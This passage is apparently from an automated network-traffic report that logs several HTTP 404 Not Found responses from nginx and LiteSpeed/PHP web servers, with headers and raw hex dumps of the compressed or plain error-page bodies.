        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Tue, 04 Jun 2024 12:17:51 GMTContent-Type: text/htmlContent-Length: 571Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 04 Jun 2024 12:18:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 25 Jul 2023 10:57:57 GMTETag: W/"afe-6014d9a904f4f"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 04 Jun 2024 12:18:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 25 Jul 2023 10:57:57 GMTETag: W/"afe-6014d9a904f4f"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 04 Jun 2024 12:18:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 25 Jul 2023 10:57:57 GMTETag: W/"afe-6014d9a904f4f"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 04 Jun 2024 12:18:09 GMTContent-Type: text/htmlContent-Length: 2814Connection: closeVary: Accept-EncodingLast-Modified: Tue, 25 Jul 2023 10:57:57 GMTETag: "afe-6014d9a904f4f"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Jun 2024 12:18:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/7.4.33x-litespeed-tag: 2cc_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://brongal.by/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecontent-encoding: gzipvary: Accept-Encodingx-turbo-charged-by: LiteSpeedData Raw: 33 33 63 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 46 92 d8 e7 66 84 fe 43 0d e4 ed 26 25 00 04 c0 37 d9 6c ad 34 92 76 65 cf 48 b2 66 e6 b4 be e9 09 46 11 28 92 e8 01 01 2c 0a ec 87 5a 8c d8 dd b3 cf 1f 7c 11 b6 c3 1f 1c 61 47 d8 71 1f fd 4d be 5d 9d f7 ee 56 fa e0 5f c0 f9 47 8e ac 07 50 20 41 36 fb b1 d6 ee 85 26 24 36 59 8f cc ac ac ac ac ac 47 66 1d 3f f2 22 37 bd 8a 09 9a a5 f3 e0 a4 72 0c 7f 50 80 c3 e9 50 4b 16 c6 17 2f 34 48 23 d8 3b a9 1c 1c cf 49 8a 91 3b c3 09 25 e9 50 7b f1 fc 63 a3 ab 65 e9 21 9e 93 a1 76 ee 93 8b 38 4a 52 0d b9 51 98 92 30 1d 6a 17 be 97 ce 86 1e 39 f7 5d 62 b0 1f 3a f2 43 3f f5 71 60 50 17 07 64 68 33 28 81 1f be 46 09 09 86 5a 9c 44 13 3f 20 1a 9a 25 64 32 d4 66 69 1a d3 7e bd 3e 9d c7 53 33 4a a6 f5 cb 49 58 b7 79 25 46 12 43 7d 94 44 e3 28 a5 47 19 e2 a3 30 f2 43 8f 5c ea 68 12 05 41 74 71 84 ea 27 95 ca c1 f1 23 c3 40 cf 67 3e 45 d4 4f 09 f2 29 8a e2 d4 9f fb 5f 11 0f 5d f8 e9 0c a5 33 82 fe 4d 84 69 8a 9e 7d f4 19 8a 83 c5 d4 0f d1 b9 e3 98 0d 64 20 49 cb 15 14 30 dd 68 5e bf 88 12 2f 4e 08 a5 75 5e 94 d6 29 89 ea c8 30 80 33 a9 9f 06 e4 64 f5 b7 6f 7e f3 e6 57 ab 6f 56 df ad 7e ff e6 af 57 df a0 d5 77 ab 6f e1 e3 9b d5 3f ac 7e b7 fa 16 be 21 03 7d 90 44 e1 14 07 c7 75 5e 4b 32 3c 4e a2 98 24 e9 d5 50 8b a6 fd 20 02 8e 29 dc 4d 16 a3 2f 5e 68 d0 34 d1 3f 85 e2 0c 92 52 fa 76 94 6c 05 0b 9c 1b 01 d7 15 d0 82 7a 51 87 ba 89 1f a7 08 24 6b a8 e1 38 0e 7c 17 a7 7e 14 d6 03 ef dd 33 1a 85 1a 72 03 4c e9 50 63 8c 34 a8 3b 23 73 6c 4c 13 1c cf b4 93 6b ed a7 4c 7a 2e 53 ad 9f f5 3e 2f 02 fd af e9 da 4f 79 c9 fe cb 6b ed a7 80 43 eb 6b 5f 92 f1 33 3f 25 90 e9 7b 4a bd 31 e7 aa 39 be aa bf 7d 41 c6 40 ba a6 6b 8b 24 28 2f a3 e9 1a 6b 58 5f 93 0d d2 35 8f f0 e6 f8 51 a8 f5 35 4d d7 e2 c5 38 f0 e9 8c 24 5a ff 7a 07 ba 28 99 e2 d0 ff 8a 35 5c 5b ea 5a 1c c1 88 f0 71 f0 be 0b bc d0 54 f2 9f 11 9c b8 33 91 a1 6b 29 4e a6 24 65 e0 45 fb 3e 0a d3 e4 ea f3 c8 0f 53 4e fe 73 32 8f 03 9c 42 d3 a5 50 2a 4d 7d 8f 0e af 29 03 39 4a 49 32 1f d1 34 f1 c3 e9 12 a8 f8 e5 82 24 57 86 1f c6 0b 60 6f 42 7e b9 f0 13 e2 21 36 88 36 ab 68 cb 57 ba e6 87 4f 70 38 5d e0 29 60 e3 6a 61 a9 e7 ac ff 4c 6d e7 2e fe 17 18 92 31 7a f5 5f 57 df ac 7e bb fa fe cd af 56 df af 7e b7 fa 6e f5 3d 8c 8e 7f 5c 7d f3 e6 df ae be 35 de fc d5 9b 5f af be 59 fd ee cd df ac fe f7 ea 1b 74 aa ad fe 33 2b f8 dd ea b7 ab 6f 56 ff 74 0a fd b1 ab 37 83 68 1a a9 7c fc 64 8e a7 e4 b3 f1 19 71 81 91 Data Ascii: 33cb}kFfC&%7l4veHfF(,Z
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Jun 2024 12:18:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/7.4.33x-litespeed-tag: 2cc_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://brongal.by/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecontent-encoding: gzipvary: Accept-Encodingx-turbo-charged-by: LiteSpeedData Raw: 33 33 63 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 46 92 d8 e7 66 84 fe 43 0d e4 ed 26 25 00 04 c0 37 d9 6c ad 34 92 76 65 cf 48 b2 66 e6 b4 be e9 09 46 11 28 92 e8 01 01 2c 0a ec 87 5a 8c d8 dd b3 cf 1f 7c 11 b6 c3 1f 1c 61 47 d8 71 1f fd 4d be 5d 9d f7 ee 56 fa e0 5f c0 f9 47 8e ac 07 50 20 41 36 fb b1 d6 ee 85 26 24 36 59 8f cc ac ac ac ac ac 47 66 1d 3f f2 22 37 bd 8a 09 9a a5 f3 e0 a4 72 0c 7f 50 80 c3 e9 50 4b 16 c6 17 2f 34 48 23 d8 3b a9 1c 1c cf 49 8a 91 3b c3 09 25 e9 50 7b f1 fc 63 a3 ab 65 e9 21 9e 93 a1 76 ee 93 8b 38 4a 52 0d b9 51 98 92 30 1d 6a 17 be 97 ce 86 1e 39 f7 5d 62 b0 1f 3a f2 43 3f f5 71 60 50 17 07 64 68 33 28 81 1f be 46 09 09 86 5a 9c 44 13 3f 20 1a 9a 25 64 32 d4 66 69 1a d3 7e bd 3e 9d c7 53 33 4a a6 f5 cb 49 58 b7 79 25 46 12 43 7d 94 44 e3 28 a5 47 19 e2 a3 30 f2 43 8f 5c ea 68 12 05 41 74 71 84 ea 27 95 ca c1 f1 23 c3 40 cf 67 3e 45 d4 4f 09 f2 29 8a e2 d4 9f fb 5f 11 0f 5d f8 e9 0c a5 33 82 fe 4d 84 69 8a 9e 7d f4 19 8a 83 c5 d4 0f d1 b9 e3 98 0d 64 20 49 cb 15 14 30 dd 68 5e bf 88 12 2f 4e 08 a5 75 5e 94 d6 29 89 ea c8 30 80 33 a9 9f 06 e4 64 f5 b7 6f 7e f3 e6 57 ab 6f 56 df ad 7e ff e6 af 57 df a0 d5 77 ab 6f e1 e3 9b d5 3f ac 7e b7 fa 16 be 21 03 7d 90 44 e1 14 07 c7 75 5e 4b 32 3c 4e a2 98 24 e9 d5 50 8b a6 fd 20 02 8e 29 dc 4d 16 a3 2f 5e 68 d0 34 d1 3f 85 e2 0c 92 52 fa 76 94 6c 05 0b 9c 1b 01 d7 15 d0 82 7a 51 87 ba 89 1f a7 08 24 6b a8 e1 38 0e 7c 17 a7 7e 14 d6 03 ef dd 33 1a 85 1a 72 03 4c e9 50 63 8c 34 a8 3b 23 73 6c 4c 13 1c cf b4 93 6b ed a7 4c 7a 2e 53 ad 9f f5 3e 2f 02 fd af e9 da 4f 79 c9 fe cb 6b ed a7 80 43 eb 6b 5f 92 f1 33 3f 25 90 e9 7b 4a bd 